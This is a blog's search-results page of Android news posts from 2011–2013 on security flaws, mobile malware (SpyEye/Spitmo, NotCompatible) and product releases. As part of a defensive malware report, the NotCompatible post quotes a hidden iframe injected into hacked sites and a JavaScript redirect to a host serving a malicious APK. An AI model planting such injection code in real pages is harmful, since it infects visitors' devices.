Showing posts sorted by relevance for query Android. Sort by date Show all posts
Showing posts sorted by relevance for query Android. Sort by date Show all posts

AnDevCon 2 (The Android Developer Conference)

Posted by Avik Sarkar On 9/23/2011 01:51:00 pm


The technical conference for software developers building or selling Android apps, arrives after a smashing debut in March, 2011 (nearly 1,000 attendees and 20 major sponsors).  It will offer one day of intensive workshops, followed by three days of technical classes.  More than 1,000 software developers, engineers and entrepreneurs from 35 nations are projected to attend Android DevCon and choose from 70 classes to bring Android open source development to a high level.
Android handsets are taking the world by storm.  And because it’s an open platform, Android is finding its way into tablets, set-top boxes and just about everything you can imagine.
You can receive a $100 discount off the Full Event Passport and/or gain free admission to the exhibits

According to The AnDevCon-2 Chairman:- 

"Android’s success is incredible. Driven by the energy of the open-source movement, backed by many of the biggest names in software, hardware and carrier services, Android is taking off like a rocket. Between handsets and the emerging world of Honeycomb-based tablets, there are superlatives everywhere. Astounding. Amazing. Astonishing. And that’s just the letter “A.”
Come to AnDevCon II: The Android Developer Conference to learn how to succeed with your mobile apps development, deployment and marketing.
AnDevCon is focused 100% on your need to thrive in the hot and exciting world of Android apps. Produced by BZ Media – publishers of SD Times, the newspaper for the software development industry – this is the most info-packed, most practical Android conference in the world. At AnDevCon, you'll be able to choose from dozens of workshops and technical classes at all levels, from overview to intermediate, from advanced to expert. Come and learn what fits your needs, as our sessions are organized into five subject areas suitable for you and everyone on your team:
Developer Essentials: These technical classes and workshops are for all Android developers and cover all programming topics.
Android Enterprise: These technical sessions cover topics specific to building and managing apps for employees, business customers and partners, such as back-end integration corporate data center communications, ERP or CRM systems.
Android Business: These classes and workshops are for entrepreneurial developers who want to learn the most effective ways of distributing and selling Android apps, including how to maximize profit through the Android Market.
Android Tablets: These classes and workshops are specific to Android Honeycomb and the world of Android tablets.
Embedded Android: These classes and workshops are for developers working close to the hardware, such as on custom devices, or diving deep into the internals of this flavor of embedded Linux.
But wait – there’s more, lots more. In the AnDevCon exhibit hall, you'll learn about the best tools, services and resources for Android developers and marketers. Mingle and network during breaks and at our big evening reception. There's more, much more… this is the conference you won't want to miss.
Join us for three days and learn from the brightest minds in the Android universe."

For registration and more information visit 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android 4.4 'KitKat' -The More Compatible, Intelligent and Simple Android Ever

Posted by Avik Sarkar On 12/07/2013 12:33:00 am

Android 4.4 'KitKat' All You Need to Know-The More Compatible, Intelligent and Simple Android Ever 

Earlier we have discussed several times on android- which is one of the world's most popular and widely used operating system based on Linux kernel, mainly designed for smartphones and tablet computers. Since last four years we have got various flavor of android among them 2.2 (Froyo), 2.3.3–2.3.7 (Gingerbread), 3.2 (Honeycomb), 4.0.3–4.0.4 (Ice Cream Sandwich) & 4.1.x-4.3.x (Jelly Bean) successfully drawn public attention and gained popularity. After the success of Jelly Bean, now Google has introduced Android 4.4 nicknamed 'KitKat.' Official website of android explained the reason of this nomenclature -'as everyone finds chocolate so tempting, we decided to name the next version of Android after one of our favorite chocolate treats, the KitKat®!' Immediately after this release android 4.4 is vogue as with this version of android Google improved performance and memory usage, makes this version more compatible than ever; you can easily try KitKat on your older smartphones. Now lets illuminate android 4.4 briefly-

Introduction:-
Readers, I will introduce a simple way the new features of the version of android, "The KitKat" Accompanies the more intelligent and simple search for Android, says the official Google blog, and more importantly, Should Have compatibility with older devices. This means more people que can have access to the innovations than other Android updates.

Performance and improved use of memory:-
Many of the major changes are the KitKat under the hood. The overall performance should improve, especially in relation to RAM. The Android developers site says "KitKat streamlines all the key components to reduce memory consumption", so even older smartphones running Android 4.4 will be faster and more responsive - even with 512MB of RAM. The multitasking should work better and you can switch applications without lock your smartphone.

Simpler and more powerful: (Google Now)
The Google Now gained much prominence in KitKat, with quick, more cards, and more features without using their hands. Not too can wake up your smartphone to start a search and take a picture saying only "OK Google Now"? It's like Google Glass, but on your smartphone.
The Google Now will also gain space on your homescreen, if you want (and you can slide left to right to find it), and Google will add more cards to make your smartphone smarter automatically suferindo things based on your interests , location, and more.

Support SMS, location sharing, and animated GIFs in Hangouts:-
Google announced this week that Hangouts will turn the main messaging app - is text messaging, video calls and instant. If you hate having your conversations scattered in several different apps, with KitKat you need only Hangouts, which replaces the old Mail app.
The use of location sharing can be very convenient when you're meeting a friend and wants to tell exactly where it is.
Finally, if you like to put emojis in messages, are present in many new keyboard Google.

Improvements in NFC, Cloud Printing and File Management:-
The KitKat also includes improvements that developers can now use apps to improve their apps. Regarding the NFC, it may automatically take you to the right app when you touch your device into a payment terminal. Printer manufacturers can develop served to send print files from Android to your printer. And the new framework for access to storage provides a consistent way to access files stored in other facilities in other apps (eg, open or save files in Dropbox or Box when you're in the browser).
In short, I will whole heartily agree with Google while saying -KitKat 4.4 is Smart, simple, and truly yours To know more about Android 4.4 'KitKat' click here

While concluding this article, I on behalf of Team VOGH, want to thank our new guest editor Mr. Rafael Souza, for sharing his view and extensive thought on android 4.4. Rafael we love you. 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Google Deodorizes Sniffable Android Security Flaw

Posted by Avik Sarkar On 5/20/2011 06:51:00 pm



A new round of patching has begun for Android phones, the vast majority of which were found to be vulnerable to hackers if the owner was using it on an open WiFi network. The flaw affected 99.7 percent of all Android smartphones running Android 2.3.3 and earlier versions because they don't use a secure HTTPS connection, according to researchers.

Google (Nasdaq: GOOG) has begun rolling out a patch to fix a security flaw in versions 2.3.3 and earlier of its Android mobile operating system.
That flaw affects all Google services using the ClientLogin authentication protocol.
It lets hackers access any personal data available through Android's application programming interfaces (APIs).
"The flaw is now fixed for all versions of Android worldwide," Google spokesperson Randall Sarafa told LinuxInsider.
The patch is being rolled out in stages over several days, Sarafa said.

The Hole in Android
The flaw gained media attention after it was publicized by the University of Ulm.
Here's how it works: When an application wants to get access to Android's APIs, it requests an authentication token through ClientLogin by providing an account name and password.
The system then returns an authorization token, which is good for up to two weeks.
If the token is used in requests sent over unencrypted networks, such as WiFi networks, hackers can steal it. They can then use the token to access any personal data made available through the service API.
The hackers will gain full access to the victim's calendar, contacts information, or private Web-based photo albums. They'll be able to view, delete, or modify any calendar events, contacts, or private pictures, the Ulm University researchers said.
The flaw affected 99.7 percent of all Android smartphones running Android 2.3.3 and earlier versions because they don't use a secure HTTPS connection, the researchers said.
Google's patch forces an HTTPS connection for calendar and contacts sync on Android, Sarafa said.

More on the Flaw

Authentication tokens are widely used for online services such as eBay (Nasdaq: EBAY). They are also used by software and application vendors such as Microsoft (Nasdaq: MSFT) and Splunk, and in Apple's (Nasdaq: AAPL) iOS mobile operating system.
There was a problem with the authentication token on Android because Google's implementation was faulty, Paul Laudanski, director of ESET's cyber threat analysis center, told LinuxInsider.
"The entry point is having an unpatched or vulnerable Android system connecting to Google services using ClientAuth over an unencrypted public WiFi network," Laudanski explained. "The correct implementation is to transmit the authorization token in a secured manner."
Google services transmit the authorization token as an open text message, which can be easily stolen.
If the technology is implemented correctly and the authorization tokens are sent securely, then even if an unencrypted WiFi network is used, the user information would appear as garbage to snoopers, Laudanski pointed out.
Google's implementation of the technology may not have been faulty in and of itself, argues Mike Paquette, chief strategy officer at Top Layer Security.
"The problem appears to be the use of the ClientLogin protocol, allowing these sniffable authentication protocols, combined with a long expiry time," Paquette told LinuxInsider. "This makes exploits practical and even likely," he added.
Android smartphone owners should stay away from heavily used public WiFi hotspots, Paquette warned. "It's likely that attackers would target areas with large numbers of users of public WiFi in order to have the greatest return," he explained.

Old Problems Refreshed

The security flaw in Android was apparently first discovered by Dan Wallach of Princeton University, who blogged about it in February.
In an experiment during his undergraduate security class, he set up a sniffer with fellow students to listen in on his Android smartphone. They used Wireshark and Mallory.
Wireshark is a network protocol analyzer for Unix and Windows. Mallory is a transparent TCP and UDP proxy. It can be used to access network streams and assess mobile Web applications, among other things.
UDP, the User Datagram Protocol, is one of the core members of the Internet Protocol (IP) Suite. It lets applications directly send messages, or datagrams, to other hosts on an IP network.
The team found that Google doesn't encrypt traffic to Google Calendar, although it properly encrypts traffic to Gmail and Google Voice. Eavesdroppers could see victims' calendar transactions and likely impersonate them on Google Calendar, Wallach found.
The University of Ulm researchers built on Wallach's research.
Android smartphone users should apply the same security precautions to their devices as they would do with their laptops, Torsten George, vice president of marketing Reach More Customers with Live Chat - Free Whitepaper at Agiliance, told LinuxInsider.
"Smartphones are essentially taking on the role of a regular computer," George pointed out. "Thus, they are just as vulnerable to attack by cybercriminals as regular laptop or desktop computers."
Because they lack built-in security, smartphones "open up a bigger attack surface than traditional computer devices," George added

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

"Python for Android" Has Been Launched

Posted by Avik Sarkar On 1/11/2012 03:13:00 pm


A new project named "Python For Android" has been launched. The goal of this project is to package your python application into an APK. The project is under the umbrella of Kivy organization, but is not designed to be limited to Kivy only, its a opensource project. To that end, the packaged applications currently only have one "bootstrap" which decompresses the files, creates an OpenGL ES 2.0 surface for drawing and sets up to handle audio and touch events. Although built for the Kivy project, the developers welcome anyone prepared to create a new lighter bootstrap mechanism. Python has been executable on Android through the Android Scripting project, but that doesn't create simple-to-install, self-contained binary files.

Overview:- 

  1. Download Android NDK, SDK
  2. Launch "android", and download latest Android platform
  3. Export some environment variables:
    export ANDROIDSDK="/path/to/android/android-sdk-linux_86"
export ANDROIDNDK="/path/to/android/android-ndk-r7"
export ANDROIDNDKVER=r7
export ANDROIDAPI=14
  4. Clone python-for-android:
    git clone git://github.com/kivy/python-for-android
  5. Build a distribution with OpenSSL module, PIL and Kivy:
    cd python-for-android
./distribute.sh -m "openssl pil kivy"
  6. Go to your fresh distribution, build the APK of your application:
    cd dist/default
./build.py --package org.test.touchtracer --name touchtracer \
--version 1.0 --dir ~/code/kivy/examples/demo/touchtracer debug
  7. Install the debug apk to your device:
    adb install bin/touchtracer-1.0-debug.apk
  8. Enjoy.


    To Know More About The Python For Android Project Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Zeus Strategy Followed By SpyEye & Here The Victim is Android Users

Posted by Avik Sarkar On 9/18/2011 02:24:00 pm



In the world of Windows malware, SpyEye is a widespread malicious toolkit for creating and managing botnets. It is designed primarily for stealing banking credentials and other confidential information from infected systems. SpyEye is a major competitor of the infamous Zeus toolkit.
Zeus (also known as ZBot) generated a lot of interest in the mobile security community a couple of months ago when an Android version was discovered. Of course, we did not have to wait long before a version of SpyEye targeting Android was also developed, and sure enough a malicious SpyEye Android app was discovered a few days ago.
The functionality of Zeus and SpyEye on Windows is quite similar, so I was curious as to how similar their respective Android versions would be.
Zeus for Android purports to be a version of Trusteer Rapport security software. This social engineering trick is used in an attempt to convince the user that the application they are installing is legitimate.
SpyEye for Android, now detected by Sophos products as Andr/Spitmo-A, uses a slightly different but similar social engineering technique. When the user of a PC infected by the Windows version of SpyEye visits a targeted banking website, and when the site is using mobile transaction authorization numbers, the SpyEye Trojan may inject HTML content which will instruct the user to download and install the Android program to be used for transaction authorisation.


The SpyEye application package does not show up as an icon in the "All apps" menu, so the user will only be able to find the package when the "Manage Applications" is launched from the mobile device's settings.
The application uses the display name "System" so that it seems like a standard Android system application.
When installed, Zeus for Android displayed a fake activation screen, and Spitmo is again very similar. However, Spitmo uses different tactics to convince the user that it is a legitimate application.
It applies for the following Android permissions:-
  • android.provider.Telephony.SMS_RECEIVED
  • android.intent.action.NEW_OUTGOING_CALL

This allows the malware to intercept outgoing phone calls. When a number is dialed, the call is intercepted before the connection is made and the dialed phone number is matched to a special number specified by the attacker in the alleged helper application installation instructions. If the number matches, Spitmo displays a fake activation number, which is always 251340. Once installed, the functionality of Zeus and SpyEye are pretty much the same. A broadcast receiver intercepts all received SMS text messages and sends them to a command and control server using an HTTP POST request. The submitted information includes the sender's number and the full content of the message.So far, it does not seem that this attack is widespread, but it shows that the developers of major malicious toolkits are closely watching their competition and matching the latest features. It also seems that support for Android is increasingly becoming an important part of their product strategy.

-News Source (N.Security)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Ubuntu for Android - A Full Ubuntu Desktop, On Your Docked Android Phone

Posted by Avik Sarkar On 2/23/2012 12:04:00 am

Ubuntu for Android - A Full Ubuntu Desktop, On Your Docked Android Phone
We have a great news for both Ubuntu & Android lovers. Canonical has announced a new product called Ubuntu for Android that will bring the popular Linux distribution to high-end Android smartphones. The product consists of a complete Ubuntu desktop experience that is intended to be installed on the device alongside the standard Android environment. Users will be able to run Ubuntu from their phone when they plug the device into a dock that connects to a keyboard and monitor. The underlying concept is similar to that of the WebTop environment that Motorola ships on the Atrix handset and other devices.
The new Ubuntu variant runs on top of the Android kernel and is designed to work well on devices with dual-core ARM CPUs. Unlike Motorola's Ubuntu-based WebTop environment, Ubuntu for Android brings a much more complete desktop stack with a number of popular applications. It also provides more comprehensive integration with the Android environment on the user's phone. The default application stack includes the Chromium Web browser, the Thunderbird e-mail client, the Gwibber social networking program, the VLC video player, and a selection of other software. The environment includes a unified contact system that will make the user's Android address book fully accessible in the Ubuntu environment. It can also detect the social network accounts that the user has configured in Android and automatically enable them in Gwibber. Further details can be found Here


-Source (Ubuntu & Arstechnica)




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Skype Fixes Android App Vulnerability

Posted by Avik Sarkar On 4/25/2011 12:38:00 am

Skype has fixed the privacy vulnerability its Android application that allowed malicious apps to harvest user data.
The vulnerability has been addressed in the latest Skype for Android, Version 1.0.0.983, and the user data has been properly secured on the mobile device, Adrian Asher, chief information security officer at Skype, wrote on the Skype blog on April 20. The problem did not exist for Verizon customers.

Skype for Android was storing names, dates of birth, location information, account balances, phone numbers, email addresses and other biographic details in a nonencrypted and easily accessible file on the mobile device, Justin Case, an amateur Android developer, wrote on the Android Police blog on April 15. Any rogue app could have harvested the personal data as well as old instant messages from insecure database files, according to Case.

Android by default sandboxes applications so that data from one app can’t be accessed by another. In this case, Skype overwrote the default by assigning incorrect file-level permissions, Case said. The data-collecting app Case developed to demonstrate the vulnerability did not require any unusual permissions and worked on non-jailbroken Android devices.

“We have had no reported examples of any third-party malicious application misusing information from the Skype directory on Android devices,” Asher said.

Case confirmed that the updated version closed the security hole and that his sample rogue app no longer can access the information stored in the database, David Ruddock posted on the Android Police blog. Skype changed the permissions of the databases where the data was stored so that only the Skype app can access the information, Ruddock said.

Case noted that the database files were unencrypted in his original analysis. Skype did not respond to eWEEK’s requests for whether the data is encrypted in the new version.

Case originally discovered the issue in the beta version of Skype Video that had been released last week. The fix will be addressed when Skype launches the official version.

In addition to the security fix, Skype added the ability to make VOIP (voice over IP) calls over 3G data connections to the app, even for calls in the United States. The 3G calling feature in the app will not be supported for Android phones over the Verizon Wireless network because Verizon already allows 3G Skype calls, thanks to an exclusive partner agreement signed in 2010.

The Android app previously allowed users to only send instant messages or place calls using the phone’s existing service or over WiFi. With this new version, users can call anyone without using up any minutes on their calling plan because the calls are carried over the mobile data plan. Bypassing the mobile carrier is not entirely free, as users are still subject to Skype fees.

Major carriers have opposed the practice in the past, and only Verizon customers had Skype’s VOIP capability up until now. Even if users aren’t interested in 3G calls, they should upgrade just for the security fix.

Asher reminded users to download the app only from Skype or the official Android Market links to avoid malicious apps.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

National Security Agency (NSA) Released Security Enhanced (SE) Android

Posted by Avik Sarkar On 1/17/2012 12:50:00 am


US National Security Agency (NSA) released the first public release of the Security Enhanced (SE) Android Project, a program designed to find and plug security holes and risks in the Android flavor of Linux. SE Android is based on the NSA’s SELinux, first released in 2000.
SEAndroid is the name of both a project to identify, and find solutions for, critical gaps in Android security and of a reference implementation of a security enhanced Android. The project is currently focusing its efforts on enabling SELinux functionality in the hope that it can limit the damage done by malicious apps, but hopes to widen its scope in the future.
SE Android was first publicly described at Linux Security Summit 2011. In essence, the NSA is attempting to bring the same access control and damage mitigation measures found in SELinux to the Android Open Source Project. In the Security Summit presentation, a number of known security vulnerabilities were demonstrated and tested against a version of Android running SE Android controls. All exploits failed unless specifically tailored to the particular system, and even in those cases the exploit’s effectiveness was much reduced.
SEAndroid is only available as source and is built by cloning the Android Open Source Project (AOSP) git repository, and then applying the SE Android modifications from the project’s git repository. Currently the project is builds on Fedora 16, and has built on Fedora 14 and 15. Instructions how to build for emulators and devices (specifically the Nexus S) and how to get started developing policies are available from the project’s wiki.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Releases SkyDrive For Android Phones

Posted by Avik Sarkar On 8/30/2012 01:38:00 am

Microsoft Releases SkyDrive For Android Phones

Few weeks ago software giant Microsoft announced to release an official SkyDrive app for Android phones.  So finally the application is ready to download and use. This new app for Android is similar to other mobile apps for Windows Phone and iOS and is a key part of making sure your SkyDrive files are accessible and shareable from all your devices. The app was mainly designed to work best with Android 4.0 Ice Cream Sandwich, though it will work on Android 2.3 and above. "In building the new SkyDrive app for Android, we wanted to ensure we kept the same intuitive design of all SkyDrive experiences while also making use of Android design patterns and conventional interactions, so this feels natural for people with Android phones," Mike Torres, group program manager for SkyDrive Apps, wrote in a blog post Tuesday.



Brief Description:-
SkyDrive is the place to store your files so you can access them from virtually any device. With SkyDrive for Android, you can now easily access and share files on the go. You can also upload photos or videos from your phone to SkyDrive.

Features:-

  • Access all of your SkyDrive content including files shared with you.
  • View recently used documents.
  • Choose multiple photos or videos to upload from your phone.
  • Share your files and photos – send a link in email or in another app.
  • Open your SkyDrive files in other Android apps.
  • Manage your files – delete, or create new folders.
The official SkyDrive app is now available in the Google Play store. For more information and to download click here.






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android Vulnerability- Hacker Can Gains Complete Control Into Your SmartPhone

Posted by Avik Sarkar On 2/27/2012 07:40:00 pm

Android Vulnerability- Hacker Can Gains Complete Control Into Your SmartPhone  
 
Security experts have discovered a serious flaw in a component of the operating system of Google Inc’s widely used Android smartphone that they say hackers can exploit to gain control of the devices. Researchers at startup cyber security firm CrowdStrike said they have figured out how to use that bug to launch attacks and take control of some Android devices.
CrowdStrike, which will demonstrate its findings next week at a major computer security conference in San Francisco, said an attacker sends an email or text message that appears to be from a trusted source, like the user’s phone carrier. The message urges the recipient to click on a link, which if done infects the device. At that point, the hacker gains complete control of the phone, enabling him or her to eavesdrop on phone calls and monitor the location of the device, said Dmitri Alperovitch, chief technology officer and co-founder of CrowdStrike.
Google spokesman Jay Nancarrow declined comment on Crowdstrike’s claim. Alperovitch said the firm conducted the research to highlight how mobile devices are increasingly vulnerable to a type of attack widely carried out against PCs. In such instances, hackers find previously unknown vulnerabilities in software, then exploit those flaws with malicious software that is delivered via tainted links or attached documents. He said smartphone users need to prepare for this type of attack, which typically cannot be identified or thwarted by mobile device security software.
“With modifications and perhaps use of different exploits, this attack will work on every smartphone device and represents the biggest security threat on those devices,” said Alperovitch, who was vice president of threat research at McAfee Inc before he co-founded CrowdStrike.
Researchers at CrowdStrike were not the first to identify such a threat, though such warnings are less common than reports of malicious applications that make their way to online websites, such as Apple’s App Store or the Android Market.
In July 2009, researchers Charlie Miller and Collin Mulliner figured out a way to attack Apple’s iPhone by sending malicious code embedded in text messages that was invisible to the phone’s user. Apple repaired the bug in the software a few weeks after the pair warned it of the problem.
The method devised by CrowdStrike currently works on devices running Android 2.2, also known as Froyo. That version is installed on about 28 percent of all Android devices, according to a Google survey conducted over two weeks ending February 1. Alperovitch said he expects to have a second version of the software finished by next week that can attack phones running Android 2.3. That version, widely known as Gingerbread, is installed on another 59 percent of all Android devices, according to Google. CrowdStrike’s method of attack makes use of a previously unpublicized security flaw in a piece of software known as webkit, which is built into the Android operating system’s Web browser.


-Source (MyBoradband, Google, CrowdStrike)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android becomes second most popular malware

Posted by Avik Sarkar On 6/02/2011 03:51:00 pm



The first quarter was the most active in malware history and mobile attacks are moving to the forefront, according to McAfee data. Android attacks are also picking up. McAfee’s first quarter threat report noted that attacks surged in the first quarter, but spam has fallen. In fact, there were 6 million unique malware samples in the first quarter, the highest ever for the first three months of the year. February had the most new malware samples—2.75 million. Fake anti-virus software—think Mac Defender—reached its highest levels in march with 350,000 unique samples. As for emerging threats, McAfee noted that Android devices are becoming malware havens. Android was the second most popular environment for mobile malware behind Symbian in the first quarter. Historically, Android remains No. 3.

McAfee Labs combats several developing families of malware that attack Android phones. One of the families, Android/DrdDream, comprises a variety of legitimate games and apps that have been injected with malicious code. These threats are unique and quite dangerous due to the use of two root exploits to gain greater control of those phones. The two exploits—Exploit/LVedu and Exploit/DiutesEx—were initially used by users trying to gain legitimate root access to their own devices, a process commonly referred to as rooting.1 In the PC world, malware often uses exploits to enable drive-by downloads that infect machines visiting specially designed or compromised websites. For mobile devices, much of the malware has required user interaction, but in the near future mobile exploits will certainly allow automatic malware installation. Like Android/DrdDream, the Android/Drad family is made up of maliciously modified applications.
This family sends device information to an attacker-controlled site. Just like in the PC malware world, Android/Drad listens for commands from the attacker. The malware can also download additional software, though it stops short of being a full-fledged mobile botnet. It appears that the malware uses blackhat search-engine optimization techniques, a process of manipulating search engine results to place dangerous sites higher than they should appear in lists of hits.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android handsets 'leak' personal data

Posted by Avik Sarkar On 5/17/2011 10:09:00 pm


More than 99% of Android phones are potentially leaking data that, if stolen, could be used to get the information they store online.
The data being leaked is typically used to get at web-based services such as Google Calendar.
The discovery was made by German security researchers looking at how Android phones handle identification information.
Google has yet to comment on the loophole uncovered by the researchers.
ID attack University of Ulm researchers Bastian Konings, Jens Nickels, and Florian Schaub made their discovery while watching how Android phones handle login credentials for web-based services.
Many applications installed on Android phones interact with Google services by asking for an authentication token - essentially a digital ID card for that app. Once issued the token removes the need to keep logging in to a service for a given length of time.
Sometimes, found the researchers, these tokens are sent in plain text over wireless networks. This makes the tokens easy to spot so criminals eavesdropping on the wi-fi traffic would be able to find and steal them, suggest the researchers.
Armed with the token, criminals would be able to pose as a particular user and get at their personal information.
Even worse, found the researchers, tokens are not bound to particular phones or time of use so they can be used to impersonate a handset almost anywhere.
"[T]he adversary can gain full access to the calendar, contacts information, or private web albums of the respective Google user," the researchers wrote in a blog post explaining their findings.
Abuse of the loophole might mean some people lose data but other changes may be harder to spot.
"...an adversary could change the stored e-mail address of the victim's boss or business partners hoping to receive sensitive or confidential material pertaining to their business," the team speculated.
There is no suggestion that attackers are exploiting the Android loophole at the moment.
Almost all versions of the Android operating system were passing round unencrypted authentication tokens, found the researchers. It was fixed in version 2.3.4 but, suggest Google figures, only 0.3% of Android phones are running this software.
Some Google services, such as image sharing site Picasa, are still using unencrypted authentication tokens that can be stolen, found the team.
The researchers urged Android phone owners to update their device to avoid falling victim to attacks via the loophole. Google is also known to be working with operators and handset makers to get updates to people faster than at present.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Adobe Patches Multiple Security Holes in Adobe Flash Player & AIR (CVE-2012-5274 to 5280)

Posted by Avik Sarkar On 11/09/2012 04:30:00 am

Critical Buffer Overflow, Memory Corruption & Security bypass Vulnerability in Adobe Flash Player & AIR Patched

Adobe- American multinational computer software company has released new versions of its Flash Player to eliminate a number of critical vulnerabilities  in Flash Player that could lead to system crashes or remote attackers controlling computers running compromised software. All the flaws were discovered by members of the Google Security Team are associated with several CVE numbers; CVE-2012-5274, CVE-2012-5275, CVE-2012-5276, CVE-2012-5277, CVE-2012-5280 are buffer overflows, CVE-2012-5279 is a memory corruption issue and CVE-2012-5278 is a security bypass; all of which are listed as potentially allowing an attacker to inject malicious code into the system. Google said it will update Flash Player installed with Google Chrome, and Microsoft will do the same with Internet Explorer 10. In the security bulletin Adobe said that it has released security updates for Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh, Adobe Flash Player 11.2.202.243 and earlier versions for Linux, Adobe Flash Player 11.1.115.20 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and 2.x. These updates address vulnerabilities that could cause a crash and potentially allow an attacker to take control of the affected system. 

Adobe recommends users update their product installations to the latest versions:-
  • Users of Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh should update to Adobe Flash Player 11.5.502.110.
  • Users of Adobe Flash Player 11.2.202.243 and earlier versions for Linux should update to Adobe Flash Player 11.2.202.251.
  • Flash Player installed with Google Chrome will automatically be updated to the latest Google Chrome version, which will include Adobe Flash Player 11.5.31.2 for Windows, Macintosh and Linux.
  • Flash Player installed with Internet Explorer 10 will automatically be updated to the latest Internet Explorer 10 version, which will include Adobe Flash Player 11.3.376.12 for Windows.
  • Users of Adobe Flash Player 11.1.115.20 and earlier versions on Android 4.x devices should update to Adobe Flash Player 11.1.115.27.
  • Users of Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and earlier versions should update to Flash Player 11.1.111.24.
  • Users of Adobe AIR 3.4.0.2710 and earlier versions for Windows and Macintosh, SDK (including AIR for iOS) and Android should update to Adobe AIR 3.5.0.600.

AFFECTED SOFTWARE VERSIONS:- 
  • Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.243 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.20 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.4.0.2710 and earlier versions for Windows and Macintosh, SDK (includes AIR for iOS) and Android
To verify the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select "About Adobe (or Macromedia) Flash Player" from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system. To verify the version of Adobe Flash Player for Android, go to Settings > Applications > Manage Applications > Adobe Flash Player x.x.  To verify the version of Adobe AIR installed on your system, follow the instructions in the Adobe AIR TechNote. Adobe also recommended its Adobe AIR users to update  to 3.5.0.600.
While talking about security patches in Adobe product, we want to give to reminder that just couple of weeks ago Adobe also plugged buffer overflow vulnerability in its Shockwave Player. Also in late September, Adobe disclosed that it had been attacked and hackers were using a valid Adobe certificate to sign two malicious utilities used most often in targeted attacks. Adobe revoked the certificate Oct. 4.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Posted by Avik Sarkar On 5/07/2012 06:13:00 pm

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in a iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to Lookout Mobile Security official blog post- 
How it Works :- 
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.
Technical Details :- 
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it. For detailed information click here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Samsung Galaxy S3, S2 & HTC Android Phones are Vulnerable to 'remote wipe' Hack

Posted by Avik Sarkar On 9/29/2012 02:33:00 am

Samsung Galaxy S3, S2 & HTC Android Phones are Vulnerable to 'remote wipe' Hack

Yet again a large number of Android users have been warned of a security hole. Security experts have uncovered that millions of Android handsets including the Samsung Galaxy S3, Galaxy S2, HTC One X and HTC Desire can be wiped just by visiting a malicious website that embeds particular code in weblinks. A user with a vulnerable handset who visits a page and clicks a link containing the malicious code would see their phone wiped, losing personal data such as photos and texts as well as repleaceable data such as contact details and apps. The flaw is caused by a security hole in some versions of Android's dialler software, which allows the "tel:" URL prefix to be used on a webpage to perform functions on the phone's dialling software. Normally that is useful for functions such as initiating a call on the handset directly from a site. But the tel: prefix can also be used to pass a string of non-numeric data to the dialler.
Special strings of characters can perform other functions; for example typing #06# on the dialler will display a phone's IMEI number. The flaw exploits a string that activates a factory reset of some phones because they do not force a user interaction before carrying out the function encoded in the string. The code would have to be embedded as a link to cause the user to activate it - but it would be easy to represent it as an innocent link to Google or any site. Pressing the link would initiate the wipe.
Users of vulnerable handsets may be able to install a third-party dialler and make that the default as protection against the "remote wipe" attack. Experts also pointed out that not all Android handsets have the capability for a remote wipe built in - although the number of models discovered with the vulnerability has grown since it became known on Tuesday.
Dylan Reeve, a New Zealand-based TV editor who first brought the flaw to wide notice, says that Samsung Galaxy phones which use Android 4.1 will be safe from the hack. But that still leaves millions of Galaxy S2 and some S3 models which will not have had the correct revision of the firmware rolled out to them and which could be hit.  
Though the vulnerability was fixed in Android's core code earlier this year, that code has not been propagated to every handset in use. The fact that the flaw existed in handsets from Samsung and HTC - the two biggest vendors of Android handsets - also suggests that a huge number of existing handsets could include the outdated code.

